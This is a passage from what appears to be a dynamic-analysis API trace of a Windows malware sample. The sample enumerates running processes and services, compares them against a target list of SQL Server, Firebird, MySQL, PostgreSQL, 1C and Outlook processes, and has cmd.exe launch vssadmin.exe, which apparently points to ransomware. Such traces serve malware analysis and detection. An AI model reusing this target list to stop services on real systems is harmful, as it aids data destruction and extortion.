szExeFile="dwm.exe")) returned 1 [0272.125] lstrlenW (lpString="dwm.exe") returned 7 [0272.125] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.125] lstrlenW (lpString="svchost.exe") returned 11 [0272.125] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0272.126] lstrlenW (lpString="ivttvf.exe") returned 10 [0272.126] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x510, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0272.126] lstrlenW (lpString="spoolsv.exe") returned 11 [0272.126] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0272.126] lstrlenW (lpString="cmd.exe") returned 7 [0272.126] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.134] lstrlenW (lpString="svchost.exe") returned 11 [0272.134] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0272.135] lstrlenW (lpString="conhost.exe") returned 11 [0272.135] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0272.135] lstrlenW (lpString="taskhost.exe") returned 12 [0272.135] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0272.135] lstrlenW (lpString="reader_sl.exe") returned 13 [0272.135] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0272.135] lstrlenW (lpString="dllhost.exe") returned 11 [0272.135] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x540, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0272.136] lstrlenW (lpString="vssadmin.exe") returned 12 [0272.136] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x540, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0272.136] CloseHandle (hObject=0x31c) returned 1 [0272.136] Sleep (dwMilliseconds=0x1f4) [0272.861] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x41ad350 [0272.958] EnumServicesStatusExW (in: hSCManager=0x41ad350, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 0 [0272.958] GetLastError () returned 0xea [0272.958] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa64) returned 0x3afc178 [0272.958] EnumServicesStatusExW (in: hSCManager=0x41ad350, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3afc178, cbBufSize=0xa64, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3afc178, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 1 [0272.958] CloseServiceHandle (hSCObject=0x41ad350) returned 1 [0272.958] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0272.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0272.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0272.958] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0272.958] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0272.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0272.958] lstrlenW (lpString="AudioSrv") returned 8 [0272.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0272.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0272.958] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0272.958] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0272.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0272.959] lstrlenW (lpString="BFE") returned 3 [0272.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0272.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0272.959] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0272.959] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0272.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0272.959] lstrlenW (lpString="CscService") returned 10 [0272.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0272.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0272.959] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0272.959] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0272.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0272.959] lstrlenW (lpString="DcomLaunch") returned 10 [0272.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0272.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0272.959] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0272.959] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0272.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0272.959] lstrlenW (lpString="Dhcp") returned 4 [0272.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0272.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0272.959] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0272.959] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0272.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0272.959] lstrlenW (lpString="Dnscache") returned 8 [0272.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0272.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0272.959] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0272.959] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0272.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0272.959] lstrlenW (lpString="eventlog") returned 8 [0272.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0272.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0272.959] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0272.960] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0272.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0272.960] lstrlenW (lpString="EventSystem") returned 11 [0272.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0272.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0272.960] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0272.960] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0272.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0272.960] lstrlenW (lpString="gpsvc") returned 5 [0272.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0272.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0272.960] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0272.960] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0272.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0272.960] lstrlenW (lpString="lmhosts") returned 7 [0272.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0272.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0272.960] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0272.960] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0272.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0272.960] lstrlenW (lpString="MMCSS") returned 5 [0272.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0272.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0272.960] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0272.960] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0272.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0272.960] lstrlenW (lpString="MpsSvc") returned 6 [0272.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0272.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0272.960] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0272.960] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0272.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0272.961] lstrlenW (lpString="nsi") returned 3 [0272.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0272.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0272.961] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0272.961] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0272.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0272.961] lstrlenW (lpString="PlugPlay") returned 8 [0272.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0272.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0272.961] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0272.961] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0272.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0272.961] lstrlenW (lpString="Power") returned 5 [0272.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0272.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0272.961] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0272.961] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0272.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0272.961] lstrlenW (lpString="ProfSvc") returned 7 [0272.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0272.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0272.961] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0272.961] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0272.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0272.961] lstrlenW (lpString="RpcEptMapper") returned 12 [0272.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0272.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0272.961] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0272.961] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0272.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0272.961] lstrlenW (lpString="RpcSs") returned 5 [0272.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0272.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0272.962] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0272.962] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0272.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0272.962] lstrlenW (lpString="SamSs") returned 5 [0272.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0272.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0272.962] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0272.962] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0272.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0272.962] lstrlenW (lpString="Schedule") returned 8 [0272.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0272.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0272.962] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0272.962] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0272.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0272.962] lstrlenW (lpString="SENS") returned 4 [0272.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0272.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0272.962] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0272.962] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0272.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0272.962] lstrlenW (lpString="ShellHWDetection") returned 16 [0272.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0272.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0272.962] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0272.962] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0272.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0272.962] lstrlenW (lpString="Spooler") returned 7 [0272.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0272.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0272.962] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0272.962] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0272.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0272.962] lstrlenW (lpString="Themes") returned 6 [0272.963] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0272.963] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0272.963] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0272.963] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0272.963] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0272.963] lstrlenW (lpString="UxSms") returned 5 [0272.963] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0272.963] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0272.963] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0272.963] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0272.963] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0272.963] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3afc178 | out: hHeap=0x5e0000) returned 1 [0272.963] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d4 [0272.964] Process32FirstW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.964] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0272.965] lstrlenW (lpString="System") returned 6 [0272.965] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0272.965] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0272.965] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0272.965] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0272.965] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0272.965] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0272.965] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0272.965] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0272.965] lstrlenW (lpString="smss.exe") returned 8 [0272.965] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0272.965] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0272.965] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0272.965] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0272.965] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0272.965] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0272.965] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0272.965] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0272.965] lstrlenW (lpString="csrss.exe") returned 9 [0272.966] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0272.966] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0272.966] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0272.966] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0272.966] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0272.966] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0272.966] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0272.966] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0272.966] lstrlenW (lpString="wininit.exe") returned 11 [0272.966] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0272.966] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0272.966] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0272.966] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0272.966] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0272.966] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0272.966] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0272.966] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0272.966] lstrlenW (lpString="csrss.exe") returned 9 [0272.966] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0272.966] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0272.967] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0272.967] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0272.967] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0272.967] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0272.967] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0272.967] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0272.967] lstrlenW (lpString="winlogon.exe") returned 12 [0272.967] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0272.967] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0272.967] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0272.967] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0272.967] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0272.967] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0272.967] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0272.967] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0272.967] lstrlenW (lpString="services.exe") returned 12 [0272.967] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0272.967] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0272.967] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0272.967] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0272.968] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0272.968] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0272.968] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0272.968] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0272.968] lstrlenW (lpString="lsass.exe") returned 9 [0272.968] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0272.968] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0272.968] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0272.968] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0272.968] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0272.968] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0272.968] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0272.968] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0272.968] lstrlenW (lpString="lsm.exe") returned 7 [0272.968] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0272.968] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0272.968] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0272.968] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0272.968] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0272.968] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0272.969] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0272.969] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.969] lstrlenW (lpString="svchost.exe") returned 11 [0272.969] 